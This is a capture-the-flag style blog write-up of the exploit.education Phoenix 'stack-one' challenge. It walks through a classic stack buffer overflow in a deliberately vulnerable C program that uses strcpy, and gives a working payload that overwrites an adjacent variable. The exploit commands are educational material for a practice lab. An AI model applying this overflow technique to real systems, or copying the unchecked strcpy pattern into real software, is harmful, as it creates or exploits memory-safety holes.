Post

Stack One | Phoenix - exploit.education

Posted
By Debrunbaix
2 min read
Stack One | Phoenix - exploit.education

Stack One

Ressources

Binary : stack-one
Platform : exploit.education - Phoenix

Analysis

Let’s start by running the binary and observing its behavior.

Execution

1
2
3
4
5
6
7

./stack-one
Welcome to phoenix/stack-one, brought to you by https://exploit.education
stack-one: specify an argument, to be copied into the "buffer"

./stack-one test
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Getting closer! changeme is currently 0x00000000, we want 0x496c5962

At first glance, this binary expects user input as a command-line argument.

Source Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  if (argc < 2) {
    errx(1, "specify an argument, to be copied into the \"buffer\"");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, argv[1]);

  if (locals.changeme == 0x496c5962) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
        locals.changeme);
  }

  exit(0);
}

Key Observations

  1. The program takes a command-line argument and copies it into a 64-byte buffer using strcpy().
  2. changeme is declared right after the buffer and initialized to 0.
  3. The objective is to overwrite changeme with the value 0x496c5962.

This is a classic stack buffer overflow where we aim to overwrite a variable located just after a fixed-size buffer.

Exploitation

Strategy

To successfully overwrite the changeme variable, we need to:

  • Find the offset at which changeme is located relative to the buffer.
  • Write the value 0x496c5962 in little-endian format at that exact location.

Finding the Offset

We check how many characters are needed to affect the changeme variable:

1
2
3
4
5

./stack-one $(python -c 'print "A" * 64')
# changeme is still 0x00000000

./stack-one $(python -c 'print "A" * 65')
# changeme is now 0x00000041 (41 = 'A')

So the offset is exactly 64 bytes. The 65th byte begins to overwrite changeme.

Understanding the Target Value

We want to write 0x496c5962, which in ASCII is:

1
2
3
4
5
6
7
8

>>> chr(0x49)
'I'
>>> chr(0x6c)
'l'
>>> chr(0x59)
'Y'
>>> chr(0x62)
'b'

However, the stack is little-endian, so we need to reverse the byte order. Instead of writing "IlYb", we write it in reverse: "bYlI".

Final Payload

1

./stack-one $(python -c "print 'A' * 64 + 'bYlI'")

Output

1
2

Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
exploit.education, Pwn
exploit.education Pwn Stack-Bof
This post is licensed under CC BY 4.0 by the author.